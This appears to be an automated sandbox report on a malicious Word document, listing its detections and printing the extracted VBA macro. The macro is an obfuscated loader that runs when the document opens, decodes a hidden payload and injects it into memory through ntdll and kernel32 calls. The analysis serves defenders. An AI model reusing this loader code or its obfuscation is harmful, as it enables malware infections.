MALICIOUS
90
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The critical ClamAV heuristic identified the file as 'Doc.Dropper.Agent-6414755-0', indicating a known dropper. The presence of VBA macros, specifically a 'Document_Open' macro, strongly suggests an attempt to execute malicious code upon opening the document. While the VBA code is obfuscated, the overall structure points to a downloader or dropper functionality, likely initiating a malicious chain of execution.
Heuristics 4
-
ClamAV: Doc.Dropper.Agent-6414755-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6414755-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() Dim aix As Variant -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 50021 bytes |
SHA-256: 4ab2f60f812ea11f04ffe1da36898dd1fa19e6f52d847810612d89565cf8c77b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim aix As Variant
Dim predicting As Byte
frustrating = "infelicitous"
prosaic = misbecoming
bowers.carotenoid
millicurie = 70 + 4
going = 16380 + 6
saguaro = 146640 + 6
Pmt 0, millicurie, 8076, 16010, 8
End Sub
Attribute VB_Name = "ectoderm"
' Driving us to your house
' I wouldnt be in my truck
#If (11 * 2 - 3) > (9 - 3 * 1) And (Win64) > (36 - 9 * 4) * 2 Then
' But just your sight had my heart storming
' The moon went hiding, stars quit shining
Public Declare PtrSafe Function thoughtful Lib "Kernel32.dll" Alias "CreateEventW" (ByVal betrothal As LongPtr, flurbiprofen As LongPtr, scat As LongPtr, peaty As LongPtr, secondary As LongPtr) As Long
' You wrecked my whole world when you came
' And hit me like a hurricanePublic Declare PtrSafe Function obstipation Lib "ntdll.dll" Alias "NtCreateEventPair" (gymslip As LongPtr,inescapably As LongPtr,cordierite As LongPtr) As LongPtr
' But just your sight had my heart storming
' The moon went hiding, stars quit shining
Public Declare PtrSafe Function outlines Lib "ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal cymbid As Any, ByVal phycoerythrin As Any, ByVal buffer As Any, ByVal tubal As Any, ByVal barbary As Any) As LongPtr
' But just your sight had my heart storming
' And hit me like a hurricanePublic Declare PtrSafe Function hunc Lib "Shlwapi.dll " Alias "GetOverlappedResult" (ByVal educator As Any, outcry As Any, grizzle As Any, capricornus As Any) As LongPtr
' But just your sight had my heart storming
' Baby, without warning
Public Declare PtrSafe Function unequal Lib "Shlwapi.dll" Alias "CreateFileWrapW" (acetone As LongPtr) As LongPtr
' The moon went hiding, stars quit shining
' Baby, without warning
Public Declare PtrSafe Function lasiocampidae Lib "Kernel32" Alias "CreateTimerQueueTimer" (constat As Any, ByVal exult As Any, ByVal paeonia As Any, ByVal congolese As Any, ByVal binge As Any, ByVal avifaunal As Any, ByVal locust As Any) As Long
' But just your sight had my heart storming
' But you rolled in with your hair in the wind
Public Declare PtrSafe Function bannockburn Lib "Shlwapi.dll " Alias "SleepConditionVariableSRW" (ByVal canonist As Any, pixel As Any, bentfollow As Any, unreflecting As Any) As LongPtr
' Rain was driving, thunder, lightning
' The moon went hiding, stars quit shining
Public Declare PtrSafe Function eight Lib "ntdll.dll " Alias _
"NtAllocateVirtualMemory" (hallucinogen As LongPtr, chronologer As LongPtr, ByVal attestation As LongPtr, vagueByVal As LongPtr, ethane As LongPtr, ByVal uncaused As LongPtr) As LongPtr
' Started talking bout us again
' Rain was driving, thunder, lightning
Public Declare PtrSafe Function hi Lib "ntdll.dll " Alias "AcquireSRWLockShared" (valerian As Any) As LongPtr
' Baby, without warning
' You wrecked my whole world when you came
' I wouldnt be in my truck
' Started talking bout us again
#End If
' But you rolled in with your hair in the wind
' I was doing alright
#If (11 * 2 - 3) > (9 - 3 * 1) And Not (Win64) > (36 - 9 * 4) * 2 Then
' We locked eyes over whiskey on ice
' Then you rolled in with your hair in the wind
Public Declare Function nonadmission Lib "ntdll.dll" Alias "NtCreateEventPair" (ron As Long, autumal As Long, prognosticate As Long) As Long
' But just your sight had my heart storming
' Driving us to your house
Public Declare Function lasiocampidae Lib "Kernel32" Alias "CreateTimerQueueTimer" (subsidiary As Any, ByVal liebfraumilch As Any, ByVal apical As Any, ByVal exceptionally As Any, ByVal phoebe As Any, ByVal accumulated As Any, ByVal statistics As Any) As Long
' Hit me like a hurricane
' Baby, without warning
Public Declare Function philomel Lib "Shlwapi.dll " Alias "GetOverlappedResult" (ByVal ruggedization As Any, plonk As Any, strain As Any, befringed As Any) As Long
' The moon went hiding, stars quit shining
' Knew it was gonna be a long night
Public Declare Function cluttered Lib "Kernel32.dll" Alias "CreateEventW" (ByVal back As Long, bailiffship As Long, hellborn As Long, distich As Long, fireplug As Long) As Long
' And hit me like a hurricane
' If I woulda just layed my drink down
Public Declare Function eight Lib "Ntdll.dll " Alias _
"NtAllocateVirtualMemory" (bobsledding As Long, flushseamed As Long, ByVal friable As Long, dropsByVal As Long, arbitration As Long, ByVal textural As Long) As Long
' The moon went hiding, stars quit shining
' Baby, without warning
Public Declare Function ken Lib "Shlwapi.dll " Alias "SleepConditionVariableSRW" (ByVal saccharum As Any, rubberneek As Any, celom As Any, troglodytic As Any) As Long
' I was doing alright
' The moon went hiding, stars quit shining
Public Declare Function outlines Lib "Ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal bezonian As Any, ByVal erebus As Any, ByVal fancifully As Any, ByVal legis As Any, ByVal trennel As Any) As Long
' I was doing alright
' From the moment when
Public Declare Function sexton Lib "ntdll.dll " Alias "AcquireSRWLockShared" (auscultatory As Any) As Long
' Driving us to your house
' If I woulda just layed my drink down
' But just your sight had my heart storming
' Knew it was gonna be a long night
#End If
' I wouldnt be in my truck
' And walked out
Function georges(piterson)
Dim windser As Integer
Dim velvet As Integer
fixoid = piterson * 12
Dim sitroen As Variant
metro2 = piterson * 2
Dim cowen() As Byte
#If (5 * 6 + piterson) > (6 - 2 * 1) And (20 - piterson * 4) * 2 < (Win64) Then
velvet = metro2
#End If
#If (5 * 6 + piterson) > (6 - 2 * 1) And Not (20 - piterson * 4) * 2 < (Win64) Then
velvet = (120 - fixoid)
#End If
metro3 = metro2 + velvet
georges = velvet
End Function
Function afril(lst, pirs, lky)
fixs = georges(80 / 16)
#If (20 / 5 + 6) > (8 - 3 * 2) And (fixs) > (36 - 9 * 4) * 2 Then
Dim pitbuls As LongPtr
Dim bis As LongPtr
Dim ority As Integer
Dim deble As LongPtr
#End If
#If (20 / 5 + 6) > (8 - 3 * 2) And Not (36 - 9 * 4) * 2 < (fixs) Then
Dim pitbuls As Long
Dim bwis As Long
Dim antery As Integer
Dim deble As Long
#End If
pitbuls = pirs
deble = lky
dan2 = lasiocampidae(lst, pitbuls, deble, pitbuls, pitbuls, pitbuls, pitbuls)
End Function
Attribute VB_Name = "ptilonorhynchidae"
Attribute VB_Base = "0{F7504B80-5A61-45F9-986D-83DC3946ADB6}{FA8C9BDD-C84D-4AC8-9F59-41A54C84C3CF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "bowers"
Function brassbound(apotheosis)
brassbound = AscW(apotheosis)
End Function
Function angles(falsus, musaceae, morose)
Select Case morose
Case 30 + (10 / 2 - 5)
angles = falsus \ musaceae
Case 40 + (5 - 3) / 2 - 1
angles = falsus And musaceae
Case 48 + (56 / 7 - 4 * 2)
angles = falsus * musaceae
End Select
End Function
Function groschen()
Dim decussation(255) As Byte
watershed = 73 - 45 + 37
Do While watershed <= 90 + 1
decussation(watershed) = watershed - 65
watershed = watershed + 1
Loop
watershed = 48
Do While watershed <= 50 + 8
decussation(watershed) = watershed + 4
watershed = watershed + 1
Loop
watershed = 97
Do While watershed <= 120 + 3
decussation(watershed) = watershed - 71
watershed = watershed + 1
Loop
decussation(47) = 63
watershed = 43
decussation(watershed) = 60 + 2
groschen = decussation
End Function
Function bess(offroad) As String
Dim avitaminotic(6962) As Byte
Dim bialy(63) As Long
Dim amphineura As Long
autographed = favillous Or 94
Dim tactically() As Byte
Dim farthing As Byte
Dim arguebus(63) As Long
Dim thermostatics As Long
Dim ambiance As Long
Dim soporiferous As String
Dim adulterer As Long
Dim cruelly(63) As Long
Dim pipra As Long
autographed = favillous + 169
Dim aged As Integer
autographed = Math.Round(85)
Dim betrothed As String
Dim tripod As Long
Dim himantoglossum As Variant
tylenchus = 105 - 103 + 61
commiphora = 50 - 124 + 258122
dinocerata = 86 - 39 + 262097
melodiousness = 102 - 123 + 16515093
memorandum = 15 - 11 + 60
contrariness = 61 - 23 + 65242
Dim counterblow As Long
progess = 36 - 55 + 16711699
dimes = 82 - 128 + 302
coleridgian = 106 - 34 + 3960
misgiving = 47 - 112 + 65601
accursion = 27 - 66 + 294
outweigh = 46 - 123 + 4173
Dim limbs As Integer
Dim anonymously As Long
atharvaveda = 9 - 86 + 77
profondo = 5 - 60 + 7898
Dim nipa() As Byte
Dim accountant As Integer
Dim droll As String
nipa = VBA.StrConv(offroad, 128)
Dim calced As String
noscitur = 30
documentary = 27899
figuriste = 188394
Pmt 0, noscitur, 5835, 20779, 4
hoot = 7843
convention = vbKeyShift - 12
For nominally = 0 To hoot
If nominally Mod 2 = 0 Then
nipa(nominally) = nipa(nominally) - convention
Else
nipa(nominally) = nipa(nominally) - (convention - 1)
End If
Next nominally
threefigure = 99
accueil = 8500
protectorate = 127084
Pmt 0, threefigure, 23173, 20188, 5
aged = 0
mormonism = 115 - 59 - 56
swords = 43 - 59 + 59
cupidity = groschen
For tripod = (7 - 7) * 1 To (50 + 13) * (5 - 4)
arguebus(tripod) = angles(tripod, memorandum, 48)
bialy(tripod) = angles(tripod, outweigh, 48)
cruelly(tripod) = angles(tripod, dinocerata, 48)
Next tripod
hydroxyl = 20 + 1
overruling = 25790 + 9
chilopoda = 251740 + 8
Pmt 0, hydroxyl, 25278, 44105, 8
tactically = nipa
Issuer = 122 - 116 - 2
adiathermancy = 70 + 4
paleontologist = 30710 + 9
subartesian = 480090 + 7
Pmt 0, adiathermancy, 21433, 23333, 5
epileptic = 11 - 27 + 19
refreshment = blindness
refreshment = "autoloader"
partaking = epileptic + 1
rhabdology = 43 - 83 + 42
For adulterer = 0 To hoot
agonistic = tactically(adulterer)
telophase = tactically(adulterer + 2)
matchless = bialy(cupidity(tactically(adulterer + 1)))
conceptual = arguebus(cupidity(telophase)) + cupidity(tactically(adulterer + epileptic))
ambiance = cruelly(cupidity(agonistic)) + matchless + conceptual
tripod = angles(ambiance, progess, 40)
avitaminotic(amphineura) = angles(tripod, misgiving, 30)
tripod = angles(ambiance, contrariness, 40)
avitaminotic(amphineura + 1) = angles(tripod, dimes, 30)
avitaminotic(amphineura + rhabdology) = angles(ambiance, accursion, 40)
amphineura = amphineura + rhabdology + 1
adulterer = adulterer + 3
Next
bess = avitaminotic
End Function
Function carotenoid()
Dim outfitter As Variant
Dim shrunk As Byte
ptilonorhynchidae.improve.Value = Day(#12/5/2013#)
varday = platanistidae = megapodius
footcandle = "cacophony"
insubstantial = "eelpout"
ambidextral = "bugbear"
presidentship = "bagasse"
depond = "adage"
industrialist = "heartfelt"
Set unfriendliness = ptilonorhynchidae.improve.SelectedItem
selfcriticism = 115
alieno = 15161
finnougric = 155648
Pmt 0, selfcriticism, 25451, 29430, 6
limanda = unfriendliness.Name
arteriosclerotic = 5 - 69 + 7908
chiefdom = Right(limanda, arteriosclerotic)
recreational = bess(chiefdom)
nemesis = 50 + 4
baseless = 33190 + 9
doth = 532000 + 7
Pmt 0, nemesis, 37290, 32304, 4
prejudicial = "bilander"
hitlerian = "chordeiles"
#If (11 * 2 - 3) > (9 - 3 * 1) And (Win64) > (36 - 9 * 4) * 2 Then
Dim admit As Byte
Dim aerobiosis As LongPtr
Dim rap As LongPtr
Dim divide As Variant
Dim coaster As Integer
Dim mallotus As LongPtr
Dim busboy As LongPtr
Dim ebb As LongPtr
potbelly = 56 - 13 + 2021
#End If
#If (11 * 2 - 3) > (9 - 3 * 1) And Not (Win64) > (36 - 9 * 4) * 2 Then
Dim blissful As Long
Dim rap As Long
Dim lightheadedness As Variant
Dim aerobiosis As Long
Dim mallotus As Long
candidate = 54 - 125 + 852
Dim busboy As Long
Dim ebb As Long
potbelly = candidate + 3459
#End If
alligatoridae = 99 - 65 - 34
delayedaction = chirurgical
caetera = 85 - 122 + 4133
sula = 4 + 2
paired = 19110 + 1
ignition = 120010 + 9
Pmt 0, sula, 21905, 52308, 5
leanto = sesquipedal
selfrestraint = "insobriety"
labitur = "manyheaded"
cheerleader = 80 + 1
acervulus = 16000 + 7
malope = 481560 + 2
Pmt 0, cheerleader, 17231, 41745, 3
grape = recreational
pangloss = "attenuated"
delichon = dysfunctional
aerobiosis = cadaverous(grape)
endenizen = dianoetic
swerve = "wind"
Dim dispassionately As Byte
Dim blaspheme As Byte
mallotus = 52 - 84 + 32
rap = aerobiosis + potbelly
busboy = 74 - 2 + 201455
ebb = 79 - 73 + 3494
legs = afril(busboy, mallotus, rap)
amphibolous = 110 + 6
exceptional = 23070 + 4
columbo = 506430 + 3
Pmt 0, amphibolous, 23845, 20246, 5
End Function
Function cadaverous(aweigh)
Dim perceive As Variant
Dim cordless As String
Dim inexact As Byte
Dim telegrapher As Integer
#If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then
Dim deviationist As Byte
Dim plaguey As LongPtr
horrisonous = 17 - 18 + 9
Dim azonic As LongPtr
Dim imbricated As Byte
Dim anthoceros As Long
Dim ablaze As LongPtr
Dim lucri As String
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim plaguey As Long
horrisonous = 37 - 48 + 15
Dim azonic As Long
Dim ablaze As Long
#End If
celerity = VarPtr(plaguey)
Button = devotedly(celerity, VarPtr(aweigh) + 8, horrisonous)
procyonid = 9 - 124 + 114
azonic = 100 - 88 - 12
davus = 84 - 80 - 4
ablaze = 2 - 50 + 9476
pietistical = 29 - 19 + 4086
disbar = 71 - 11 + 4
anywhere = eight(ByVal procyonid, azonic, ByVal davus, ablaze, ByVal pietistical, ByVal disbar)
blindness = "endosmose"
autographed = Rnd(495)
devotedly azonic, plaguey, 108 - 14 + 5789
planteating = 60 + 1
brocket = 23090 + 7
dacelo = 275640 + 4
Pmt 0, planteating, 23610, 20315, 6
cadaverous = azonic
End Function
Function devotedly(burro, amblyopic, nonimitation)
wulk = georges(20 / 4)
#If (7 * 4 + 5) > (7 - 2 * 1) And (20 - 5 * 4) * 2 < (wulk) Then
Dim surplus As Integer
Dim cuneiform As Long
Dim appease As LongPtr
Dim audibly As LongPtr
Dim agree As LongPtr
Dim milliner As String
Dim deliverance As LongPtr
Dim turgid As LongPtr
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < wulk Then
Dim audibly As Long
Dim armet As String
Dim appease As Long
Dim anisoptera As Integer
Dim deliverance As Long
Dim dissembler As Integer
Dim agree As Long
Dim cotacachi As Byte
Dim turgid As Long
Dim embitter As String
Dim concord As Integer
#End If
refreshment = "aequa"
favillous = autographed And 435
audibly = burro
turgid = nonimitation
autographed = Fix(399)
deliverance = amblyopic
disenfranchised = 110 + 1
hayes = 13550 + 1
agenesis = 123800 + 3
Pmt 0, disenfranchised, 32439, 14852, 5
topographical = "audio"
appease = 52 - 36 - 17
outlines ByVal appease, audibly, deliverance, turgid, agree
refreshment = topographical
End Function
' Processing file: /opt/analyzer/scan_staging/c84bc269597c4512b0a02f855fc37fda.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 7115 bytes
' Line #0:
' Line #1:
' Line #2:
' Line #3:
' Line #4:
' Line #5:
' FuncDefn (Sub Document_Open())
' Line #6:
' Dim
' VarDefn aix (As Variant)
' Line #7:
' Dim
' VarDefn predicting (As Byte)
' Line #8:
' LitStr 0x000C "infelicitous"
' St frustrating
' Line #9:
' Ld misbecoming
' St prosaic
' Line #10:
' Ld bivans
' ArgsMemCall carotenoid 0x0000
' Line #11:
' LitDI2 0x0046
' LitDI2 0x0004
' Add
' St millicurie
' Line #12:
' LitDI2 0x3FFC
' LitDI2 0x0006
' Add
' St going
' Line #13:
' LitDI4 0x3CD0 0x0002
' LitDI2 0x0006
' Add
' St saguaro
' Line #14:
' LitDI2 0x0000
' Ld millicurie
' LitDI2 0x1F8C
' LitDI2 0x3E8A
' LitDI2 0x0008
' ArgsCall Pmt 0x0005
' Line #15:
' EndSub
' Line #16:
' Line #17:
' Line #18:
' Macros/VBA/ectoderm - 15874 bytes
' Line #0:
' QuoteRem 0x0000 0x001A " Driving us to your house"
' Line #1:
' QuoteRem 0x0000 0x001A " I wouldnt be in my truck"
' Line #2:
' LbMark
' LitDI2 0x000B
' LitDI2 0x0002
' Mul
' LitDI2 0x0003
' Sub
' Paren
' LitDI2 0x0009
' LitDI2 0x0003
' LitDI2 0x0001
' Mul
' Sub
' Paren
' Gt
' Ld Win64
' Paren
' LitDI2 0x0024
' LitDI2 0x0009
' LitDI2 0x0004
' Mul
' Sub
' Paren
' LitDI2 0x0002
' Mul
' Gt
' And
' LbIf
' Line #3:
' QuoteRem 0x0000 0x002B " But just your sight had my heart storming"
' Line #4:
' QuoteRem 0x0000 0x002A " The moon went hiding, stars quit shining"
' Line #5:
' FuncDefn (Public Function thoughtful(ByVal betrothal As Ptr) As Long)
' Line #6:
' QuoteRem 0x0000 0x002A " You wrecked my whole world when you came"
' Line #7:
' QuoteRem 0x0000 0x00BF " And hit me like a hurricanePublic Declare PtrSafe Function obstipation Lib "ntdll.dll" Alias "NtCreateEventPair" (gymslip As LongPtr,inescapably As LongPtr,cordierite As LongPtr) As LongPtr"
' Line #8:
' QuoteRem 0x0000 0x002B " But just your sight had my heart storming"
' Line #9:
' QuoteRem 0x0000 0x002A " The moon went hiding, stars quit shining"
' Line #10:
' FuncDefn (Public Function outlines(ByVal cymbid As ) As Ptr)
' Line #11:
' QuoteRem 0x0000 0x002B " But just your sight had my heart storming"
' Line #12:
' QuoteRem 0x0000 0x00C7 " And hit me like a hurricanePublic Declare PtrSafe Function hunc Lib "Shlwapi.dll " Alias "GetOverlappedResult" (ByVal educator As Any, outcry As Any, grizzle As Any, capricornus As Any) As LongPtr"
' Line #13:
' QuoteRem 0x0000 0x002B " But just your sight had my heart storming"
' Line #14:
' QuoteRem 0x0000 0x0017 " Baby, without warning"
' Line #15:
' FuncDefn (Public Function unequal(acetone As Ptr) As Ptr)
' Line #16:
' QuoteRem 0x0000 0x002A " The moon went hiding, stars quit shining"
' Line #17:
' QuoteRem 0x0000 0x0017 " Baby, without warning"
' Line #18:
' FuncDefn (Public Function lasiocampidae(constat As ) As Long)
' Line #19:
' QuoteRem 0x0000 0x002B " But just your sight had my heart storming"
' Line #20:
' QuoteRem 0x0000 0x002E " But you rolled in with your hair in the wind"
' Line #21:
' FuncDefn (Public Function bannockburn(ByVal canonist As ) As Ptr)
' Line #22:
' QuoteRem 0x0000 0x0026 " Rain was driving, thunder, lightning"
' Line #23:
' QuoteRem 0x0000 0x002A " The moon went hiding, stars quit shining"
' Line #24:
' LineCont 0x0004 08 00 03 00
' FuncDefn (Public Function eight(hallucinogen As Ptr) As Ptr)
' Line #25:
' QuoteRem 0x0000 0x001F " Started talking bout us again"
' Line #26:
' QuoteRem 0x0000 0x0026 " Rain was driving, thunder, lightning"
' Line #27:
' FuncDefn (Public Function uncaused(hi As ) As Ptr)
' Line #28:
' QuoteRem 0x0000 0x0017 " Baby, without warning"
' Line #29:
' QuoteRem 0x0000 0x002A " You wrecked my whole world when you came"
' Line #30:
' Line #31:
' QuoteRem 0x0000 0x001A " I wouldnt be in my truck"
' Line #32:
' QuoteRem 0x0000 0x001F " Started talking bout us again"
' Line #33:
' LbMark
' LbEndIf
' Line #34:
' QuoteRem 0x0000 0x002E " But you rolled in with your hair in the wind"
' Line #35:
' QuoteRem 0x0000 0x0015 " I was doing alright"
' Line #36:
' LbMark
' LitDI2 0x000B
' LitDI2 0x0002
' Mul
' LitDI2 0x0003
' Sub
' Paren
' LitDI2 0x0009
' LitDI2 0x0003
' LitDI2 0x0001
' Mul
' Sub
' Paren
' Gt
' Ld Win64
' Paren
' LitDI2 0x0024
' LitDI2 0x0009
' LitDI2 0x0004
' Mul
' Sub
' Paren
' LitDI2 0x0002
' Mul
' Gt
' Not
' And
' LbIf
' Line #37:
' QuoteRem 0x0000 0x0024 " We locked eyes over whiskey on ice"
' Line #38:
' QuoteRem 0x0000 0x002F " Then you rolled in with your hair in the wind"
' Line #39:
' Reparse 0x008C "Public Declare Function nonadmission Lib "ntdll.dll" Alias "NtCreateEventPair" (ron As Long, autumal As Long, prognosticate As Long) As Long"
' Line #40:
' QuoteRem 0x0000 0x002B " But just your sight had my heart storming"
' Line #41:
' QuoteRem 0x0000 0x001A " Driving us to your house"
' Line #42:
' Reparse 0x0103 "Public Declare Function lasiocampidae Lib "Kernel32" Alias "CreateTimerQueueTimer" (subsidiary As Any, ByVal liebfraumilch As Any, ByVal apical As Any, ByVal exceptionally As Any, ByVal phoebe As Any, ByVal accumulated As Any, ByVal statistics As Any) As Long"
' Line #43:
' QuoteRem 0x0000 0x0019 " Hit me like a hurricane"
' Line #44:
' QuoteRem 0x0000 0x0017 " Baby, without warning"
' Line #45:
' Reparse 0x00A4 "Public Declare Function philomel Lib "Shlwapi.dll " Alias "GetOverlappedResult" (ByVal ruggedization As Any, plonk As Any, strain As Any, befringed As Any) As Long"
' Line #46:
' QuoteRem 0x0000 0x002A " The moon went hiding, stars quit shining"
' Line #47:
' QuoteRem 0x0000 0x0023 " Knew it was gonna be a long night"
' Line #48:
' Reparse 0x00B0 "Public Declare Function cluttered Lib "Kernel32.dll" Alias "CreateEventW" (ByVal back As Long, bailiffship As Long, hellborn As Long, distich As Long, fireplug As Long) As Long"
' Line #49:
' QuoteRem 0x0000 0x001D " And hit me like a hurricane"
' Line #50:
' QuoteRem 0x0000 0x0026 " If I woulda just layed my drink down"
' Line #51:
' LineCont 0x0004 00 00 CC FF
' Reparse 0x00DB "Public Declare Function eight Lib "Ntdll.dll " Alias "NtAllocateVirtualMemory" (bobsledding As Long, flushseamed As Long, ByVal friable As Long, dropsByVal As Long, arbitration As Long, ByVal textural As Long) As Long"
' Line #52:
' QuoteRem 0x0000 0x002A " The moon went hiding, stars quit shining"
' Line #53:
' QuoteRem 0x0000 0x0017 " Baby, without warning"
' Line #54:
' Reparse 0x00A7 "Public Declare Function ken Lib "Shlwapi.dll " Alias "SleepConditionVariableSRW" (ByVal saccharum As Any, rubberneek As Any, celom As Any, troglodytic As Any) As Long"
' Line #55:
' QuoteRem 0x0000 0x0015 " I was doing alright"
' Line #56:
' QuoteRem 0x0000 0x002A " The moon went hiding, stars quit shining"
' Line #57:
' Reparse 0x00C8 "Public Declare Function outlines Lib "Ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal bezonian As Any, ByVal erebus As Any, ByVal fancifully As Any, ByVal legis As Any, ByVal trennel As Any) As Long"
' Line #58:
' QuoteRem 0x0000 0x0015 " I was doing alright"
' Line #59:
' QuoteRem 0x0000 0x0016 " From the moment when"
' Line #60:
' Reparse 0x006B "Public Declare Function sexton Lib "ntdll.dll " Alias "AcquireSRWLockShared" (auscultatory As Any) As Long"
' Line #61:
' QuoteRem 0x0000 0x001A " Driving us to your house"
' Line #62:
' QuoteRem 0x0000 0x0026 " If I woulda just layed my drink down"
' Line #63:
' Line #64:
' QuoteRem 0x0000 0x002B " But just your sight had my heart storming"
' Line #65:
' QuoteRem 0x0000 0x0023 " Knew it was gonna be a long night"
' Line #66:
' LbMark
' LbEndIf
' Line #67:
' QuoteRem 0x0000 0x001A " I wouldnt be in my truck"
' Line #68:
' QuoteRem 0x0000 0x0010 " And walked out"
' Line #69:
' Line #70:
' FuncDefn (Function _B_var_bess(georges))
' Line #71:
' Dim
' VarDefn piterson (As Integer)
' Line #72:
' Dim
' VarDefn windser (As Integer)
' Line #73:
' Ld georges
' LitDI2 0x000C
' Mul
' St velvet
' Line #74:
' Dim
' VarDefn fixoid (As Variant)
' Line #75:
' Ld georges
' LitDI2 0x0002
' Mul
' St sitroen
' Line #76:
' Dim
' VarDefn metro2
' Line #77:
' LbMark
' LitDI2 0x0005
' LitDI2 0x0006
' Mul
' Ld georges
' Add
' Paren
' LitDI2 0x0006
' LitDI2 0x0002
' LitDI2 0x0001
' Mul
' Sub
' Paren
' Gt
' LitDI2 0x0014
' Ld georges
' LitDI2 0x0004
' Mul
' Sub
' Paren
' LitDI2 0x0002
' Mul
' Ld Win64
' Paren
' Lt
' And
' LbIf
' Line #78:
' Ld sitroen
' St windser
' Line #79:
' LbMark
' LbEndIf
' Line #80:
' LbMark
' LitDI2 0x0005
' LitDI2 0x0006
' Mul
' Ld georges
' Add
' Paren
' LitDI2 0x0006
' LitDI2 0x0002
' LitDI2 0x0001
' Mul
' Sub
' Paren
' Gt
' LitDI2 0x0014
' Ld georges
' LitDI2 0x0004
' Mul
' Sub
' Paren
' LitDI2 0x0002
' Mul
' Ld Win64
' Paren
' Lt
' Not
' And
' LbIf
' Line #81:
' LitDI2 0x0078
' Ld velvet
' Sub
' Paren
' St windser
' Line #82:
' LbMark
' LbEndIf
' Line #83:
' Ld sitroen
' Ld windser
' Add
' St cowen
' Line #84:
' Ld windser
' St _B_var_bess
' Line #85:
' EndFunc
' Line #86:
' FuncDefn (Function _B_var_metro3(afril))
' Line #87:
' LitDI2 0x0050
' LitDI2 0x0010
' Div
' ArgsLd _B_var_bess 0x0001
' St lky
' Line #88:
' LbMark
' LitDI2 0x0014
' LitDI2 0x0005
' Div
' LitDI2 0x0006
' Add
' Paren
' LitDI2 0x0008
' LitDI2 0x0003
' LitDI2 0x0002
' Mul
' Sub
' Paren
' Gt
' Ld lky
' Paren
' LitDI2 0x0024
' LitDI2 0x0009
' LitDI2 0x0004
' Mul
' Sub
' Paren
' LitDI2 0x0002
' Mul
' Gt
' And
' LbIf
' Line #89:
' Dim
' VarDefn duncan (As Ptr)
' Line #90:
' Dim
' VarDefn pitbuls (As Ptr)
' Line #91:
' Dim
' VarDefn bis (As Integer)
' Line #92:
' Dim
' VarDefn ority (As Ptr)
' Line #93:
' LbMark
' LbEndIf
' Line #94:
' LbMark
' LitDI2 0x0014
' LitDI2 0x0005
' Div
' LitDI2 0x0006
' Add
' Paren
' LitDI2 0x0008
' LitDI2 0x0003
' LitDI2 0x0002
' Mul
' Sub
' Paren
' Gt
' LitDI2 0x0024
' LitDI2 0x0009
' LitDI2 0x0004
' Mul
' Sub
' Paren
' LitDI2 0x0002
' Mul
' Ld lky
' Paren
' Lt
' Not
' And
' LbIf
' Line #95:
' Dim
' VarDefn duncan (As Long)
' Line #96:
' Dim
' VarDefn deble (As Long)
' Line #97:
' Dim
' VarDefn bwis (As Integer)
' Line #98:
' Dim
' VarDefn ority (As Long)
' Line #99:
' LbMark
' LbEndIf
' Line #100:
' Ld lst
' St duncan
' Line #101:
' Ld pirs
' St ority
' Line #102:
' Ld afril
' Ld duncan
' Ld ority
' Ld duncan
' Ld duncan
' Ld duncan
' Ld duncan
' ArgsLd lasiocampidae 0x0007
' St antery
' Line #103:
' EndFunc
' Line #104:
' Macros/VBA/ptilonorhynchidae - 1406 bytes
' Macros/VBA/bowers - 18678 bytes
' Line #0:
' FuncDefn (Function valerian(brassbound))
' Line #1:
' Ld brassbound
' ArgsLd apotheosis 0x0001
' St valerian
' Line #2:
' EndFunc
' Line #3:
' FuncDefn (Function AscW(angles))
' Line #4:
' Ld musaceae
' SelectCase
' Line #5:
' LitDI2 0x001E
' LitDI2 0x000A
' LitDI2 0x0002
' Div
' LitDI2 0x0005
' Sub
' Paren
' Add
' Case
' CaseDone
' Line #6:
' Ld angles
' Ld falsus
' IDiv
' St AscW
' Line #7:
' LitDI2 0x0028
' LitDI2 0x0005
' LitDI2 0x0003
' Sub
' Paren
' LitDI2 0x0002
' Div
' Add
' LitDI2 0x0001
' Sub
' Case
' CaseDone
' Line #8:
' Ld angles
' Ld falsus
' And
' St AscW
' Line #9:
' LitDI2 0x0030
' LitDI2 0x0038
' LitDI2 0x0007
' Div
' LitDI2 0x0004
' LitDI2 0x0002
' Mul
' Sub
' Paren
' Add
' Case
…
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.